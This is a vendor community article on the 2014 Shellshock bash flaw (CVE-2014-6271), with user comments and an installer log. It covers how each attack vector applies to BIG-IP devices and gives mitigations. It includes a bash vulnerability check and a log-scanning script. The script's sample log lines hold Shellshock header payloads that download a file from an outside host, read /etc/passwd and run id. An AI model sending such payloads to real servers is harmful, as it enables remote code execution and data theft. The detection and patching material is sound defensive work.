Technical Articles
Jeff_Costlow_10
Historic F5 Account

It's a good thing we are naming all of our vulnerabilities now; it's easier to keep track of them. I haven't seen an official designation for CVE-2014-6271, but Shellshock seems appropriate.

This vulnerability may allow a remote attacker to execute commands on your system through a feature of the bash shell. A shell is a command-line user interface with features akin to a programming language. One such feature is that bash imports shell functions from its environment: when it starts, any environment variable whose value begins with "() {" is parsed as a function definition. Vulnerable versions do not stop parsing at the end of the function body and execute whatever commands follow it. Unfortunately, that environment is in some cases populated from data a remote user controls; a CGI web server, for example, copies HTTP request headers into environment variables before it runs a script.
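The bash behaviour described above, as an added example that is not part of the original article. It shows the intended use of environment-exported functions next to the widely circulated one-line check for the bug; the only assumption is a bash binary on PATH (another path can be passed as the first argument), and the variable name probe is arbitrary:

```shell
#!/bin/sh
# Added example, not part of the original article. It shows the bash feature
# behind CVE-2014-6271 and the usual check for it.
# Assumption: a bash binary is on PATH (pass another path as $1 to test it);
# the variable name "probe" is arbitrary.

# The feature as intended: a function exported by one bash process arrives in
# a child bash through the environment and can be called there.
# Prints "imported" (or "no-bash" when bash is not installed).
exported_function_runs() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 2; }
    bash -c 'greet() { echo imported; }; export -f greet; bash -c greet' 2>/dev/null
}

# The bug: a value of the form "() { body; }; extra" is a function definition
# followed by more commands. A fixed bash stops at the closing brace (current
# versions also import only from specially named variables) and prints just
# "done"; a vulnerable bash parses the value on startup, runs past the brace
# and executes the trailing echo as well.
# Prints "vulnerable", "patched" or "no-bash"; returns 0 only when vulnerable.
shellshock_check() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo no-bash; return 2; }
    out=$(env probe='() { :; }; echo VULNERABLE' "$bash_bin" -c 'echo done' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo vulnerable; return 0 ;;
        *)            echo patched;    return 1 ;;
    esac
}

# In a CGI deployment the attacker, not the administrator, chooses that value:
# the web server copies request headers into the environment (User-Agent
# becomes HTTP_USER_AGENT) before it runs the script, which is why a request
# header can carry the payload.
exported_function_runs
shellshock_check
```

Run it as-is to test the default bash, or `shellshock_check /path/to/other/bash` to test a second binary, for example one inside a chroot or an appliance image mounted for inspection.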

F5 has confirmed that the BIG-IP web GUI is vulnerable to an authenticated user. We currently know of no unauthenticated exploit against the web GUI or against the traffic interfaces; the DHCP client case discussed below is the one unauthenticated vector we know of, and it is confined to the management network.

Walking through the attack vectors listed in Red Hat's security blog post (not a comprehensive list), here is how each applies to BIG-IP:
    •    BIG-IP does not use ForceCommand in sshd_config, so there is no ForceCommand restriction for an SSH user to bypass with this bug.
    •    BIG-IP does not contain any bash CGI programs, although it is possible that some CGI programs spawn subshells.
    •    BIG-IP does contain mod_php, but its scripts are not vulnerable.
    •    BIG-IP does contain the DHCP client dhclient and is in theory vulnerable to a malicious DHCP server. This is the only known unauthenticated, remotely exploitable vector at this time, and it applies only to the management interface. You may disable DHCP on the System :: Platform page.
    •    BIG-IP limits the use of bash to authenticated Administrator-level accounts. Non-Administrators only have access to tmsh and do not have access to bash.

We still do not believe the traffic-passing interfaces of a BIG-IP can be exploited. Please protect your management interface and ensure that it is not exposed to the Internet.

F5 will be patching CVE-2014-6271 on all BIG-IP releases. SOL15629 has been published.

Update: BIG-IP iRule mitigation has been posted. F5 LineRate has posted its mitigation. ASM has signature updates.

Comments
daniel_spillers
Nimbostratus
"At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Do you mean that traffic passing interfaces can't be used to attack the BIG-IP appliance itself? Or do you mean the traffic passing interfaces won't pass attacks to back-end servers?
Emad
Cirrostratus
And what about ASM? Is F5 planning to release any signature for it?
John_Alam_45640
Historic F5 Account
Daniel: This article refers to the security of the BIG-IP platform itself. The F5 ASM can block such attacks on backend applications when the proper signature is available. This signature can come from F5 or can be user specified. Another option is an iRule. Check this iRule: https://devcentral.f5.com/s/feed/0D51T00006j49ZqSAI
Simon_Waters_13
Cirrostratus
Can you confirm the User-Agent injection in the management interface? https://twitter.com/ashk4n/status/515121090688196609
Jeff_Costlow_10
Historic F5 Account
We can confirm that the management GUI is vulnerable to an authenticated user. We will be patching this issue as soon as possible. "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." The attack will be passed to back-end servers. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces.
pmilot
Nimbostratus
Jeff, you say "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Does this apply to the APM module as well, given that those provide web services and serve web content through its service interface?
Simon_Waters_13
Cirrostratus
Mitigation link giving Server Error?
Simon_Waters_13
Cirrostratus
Thanks. In the Twitter link they claim that apache is in the shadow group; this is not apparently the case on my F5 device. Can you provide clarity there too? Are these permissions on some devices or all devices, and is it revealed in /etc/group or somewhere else? Not that I want them running commands as apache, but I want to understand fully what I'm reading. Happy to take it to a support ticket (already open) if you don't want to discuss it here.
Sam_Pickles_110
Nimbostratus
Johny, a custom signature may be used in ASM to block Shellshock: https://auraredeye.zendesk.com/entries/56168065-Shellshock-CVE-2014-6271-Mitigation-Custom-ASM-signature This has been working well for us in production so far; we've blocked a lot of attempts particularly over the past 24 hours.
Network_Operat2
Nimbostratus
1) What about APM, used to check user certificates before passing the traffic on? That process is hosted by the F5 directly and is exposed to anonymous users. 2) To all: check your www logs for this string: "() {" - saw lots of attempts to install wow1 last night. If your F5-hosted server has bash enabled and is unpatched... it may already be owned.
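The log check suggested in the comment above, as an added example that is not from the original thread: it scans Apache combined-format access-log lines for the "() {" marker, counts hits per source address, and pulls out the command that followed the function body. The log lines are constructed for the example (addresses, paths and payloads are made up), and the script assumes the Referer and User-Agent headers appear in the log line, since those are what a CGI server exports to a script as HTTP_REFERER and HTTP_USER_AGENT.

```shell
#!/bin/sh
# Added example, not from the original thread: the log check the comments
# suggest ("look for () { in your www logs"), run over constructed sample lines.
# Assumptions: Apache "combined" log format, where the Referer and User-Agent
# headers (exported to a CGI script as HTTP_REFERER / HTTP_USER_AGENT) are the
# last two quoted fields. All addresses, paths and payloads below are made up.

# Five constructed access-log lines: three Shellshock attempts, two benign.
SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:03:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/wget http://203.0.113.9/wow1 -O /tmp/wow1"
198.51.100.4 - - [25/Sep/2014:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/32.0"
203.0.113.7 - - [25/Sep/2014:03:15:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored;}; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.37.0"
192.0.2.33 - - [25/Sep/2014:03:16:40 +0000] "POST /api/login HTTP/1.1" 401 87 "-" "python-requests/2.4.1"
192.0.2.33 - - [25/Sep/2014:03:16:41 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :;}; /bin/cat /etc/passwd"'

# bash only treats a value as an exported function when it starts with exactly
# "() {" (one space), but scanners vary the whitespace, so match loosely and
# accept a few false positives rather than a miss.
SHELLSHOCK_RE='\(\) *\{'

# Number of log lines (read from stdin) carrying the marker.
shellshock_hits() {
    grep -Ec "$SHELLSHOCK_RE" || true
}

# Distinct source addresses sending the marker, as "ip count" lines.
shellshock_sources() {
    grep -E "$SHELLSHOCK_RE" | cut -d' ' -f1 | sort | uniq -c | awk '{print $2, $1}'
}

# The command that would have run after the function body: everything between
# the first "};" after the marker and the closing quote of that header field.
shellshock_payloads() {
    grep -E "$SHELLSHOCK_RE" | sed -n 's/.*() *{[^}]*}; *\([^"]*\)".*/\1/p'
}

printf '%s\n' "$SAMPLE_LOG" | shellshock_hits
printf '%s\n' "$SAMPLE_LOG" | shellshock_sources
printf '%s\n' "$SAMPLE_LOG" | shellshock_payloads
```

Against a real server, feed the log file instead of the sample, for example `shellshock_payloads < /var/log/httpd/access_log`; the extracted commands tell you what an unpatched host would already have executed, which is the first thing to triage.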
nmolwantwa_8071
Nimbostratus
Hi guys, thanks all for your posts and experiences on this issue thus far. Drawback question: what are these "*() {*;*}*" patterns, or rather what makes you search for them? I've since checked the Tcl site for a clue, but not quite there yet ;( https://www.tcl.tk/man/tcl8.4/TclCmd/string.htm#M34 Are these REs? Anyone? Most (if not all) of my backend servers are Windows, but still I'd rather use this to see what I get. So I'm excited about this post really. Cheers
Rich101
Nimbostratus
In reference to "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited. The attack will be passed to back-end servers. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces." What is the situation with an iRule which performs an HTTP redirect, or some other HTTP response to a user request? Would this not also be vulnerable in the same way that a normal web server is?
hmb104_165567
Nimbostratus
When do we expect a patch for our systems?!
Can you confirm how it is vulnerable to an authenticated user? I could not find any bash CGI scripts on our system.
Adrian_P
Nimbostratus
Is the APM Logon page object in the Access Policy vulnerable to this attack?
Alan_Renicor_10
Altocumulus
Just seen that hotfix for 11.6 has now been uploaded and the solution article updated to reflect the new hotfix.
Nathan_Bultman_
Historic F5 Account
Hotfix-BIGIP-11.5.1.5.0.147-HF5 has been released to address these CVEs. It is available at http://downloads.f5.com. SOL15629 will be republished to reflect this hotfix release shortly.
kwkyiu_53019
Nimbostratus
If the web GUI is vulnerable to an authenticated user, is it possible to reduce the exposure by disabling all user (except root/admin)?
yamamoto
Nimbostratus
Hello. I have a question about the following description: > BIG-IP does not contain any bash CGI programs, although it is possible that some CGI programs spawn subshells. What are "subshells"? I would like to know the details of these shells.
kwkyiu_53019
Nimbostratus
@yamamoto For example, let's assume that those CGI programs are implemented by Perl. But it is possible that they will call shell script inside those CGI programs.
kwkyiu_53019
Nimbostratus
It seems that 10.2.4 HF9 is not compatible with a partition-formatted disk... We failed to install it on our system.
    [abc@bigip1:Active] log lvscan
    [abc@bigip1:Active] log
    [abc@bigip1:Active] log mount
    /dev/hdc5 on / type ext3 (rw,noatime)
    none on /proc type proc (rw)
    devpts on /dev/pts type devpts (rw)
    /dev/hdc7 on /config type ext3 (rw,noatime)
    /dev/hdc9 on /usr type ext3 (ro,noatime)
    /dev/hdc8 on /var type ext3 (rw,noexec,noatime)
    /dev/hdc1 on /shared type ext3 (rw,noatime)
    /shared/.LoopbackLogFS on /var/log type ext3 (rw,loop=/dev/loop0)
    none on /dev/shm type tmpfs (rw,noatime)
    none on /var/tmstat type tmpfs (rw)
    none on /var/run type tmpfs (rw,noatime)
    prompt on /var/prompt type tmpfs (rw,size=4m)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    none on /dev/mprov/tmm type hugetlbfs (rw)
    [abc@bigip1:Active] log
    [abc@bigip1:Active] log cat liveinstall.log
    *** Live install starting at 2014/10/25 17:46:27 ***
    info: Daemon-driven execution indicated by ENV variable.
    debug: /usr/sbin/image2disk: args=--verbose --hotfix --instslot=HD1.2 /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso
    debug: caching /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso to /var/tmp/oWwMgUxTE8.
    debug: copy failed (/var/tmp/oWwMgUxTE8/EUD/metadata.pl): No such file or directory
    debug: copy failed (/var/tmp/oWwMgUxTE8/isolinux/install/perl-RPM2.rpm): No such file or directory
    info: Repository tm_install version/release is 2.8.5.1/2.0
    info: System tm_install version/release is 2.7.3/19.0
    info: Updating system tm_install files from /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso
    ..............................................................................
    7393 blocks
    info: Installer on image is newer, reexec
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hda5 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hda6 failed; ID is 82
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hda7 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hda8 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hda9 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc5 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc6 failed; ID is 82
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc7 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc8 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc9 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc10 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc11 failed; ID is 82
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc12 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc13 failed; ID is 83
    warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc14 failed; ID is 83
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 286.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 293.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 294.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 299.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 302.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 305.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 308.
    Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 286.
    Use of uninitialized value in concatenation (.) or string at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 287.
    error: Multiple entries for
    info: Expert mode enabled for non-TMOS context.
    debug: /var/tmp/install/pkgcpio/usr/sbin/image2disk: args=--reexec --verbose --hotfix --instslot=HD1.2 /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso
    info: Running updated installer.
    info: Platform id is C62a
    Terminal error: Can't find requested disk HD1.
    *** Live install complete at 2014/10/25 17:47:11: status=65280 ***
    [abc@bigip1:Active] log
Version history
Last update: 24-Sep-2014 20:38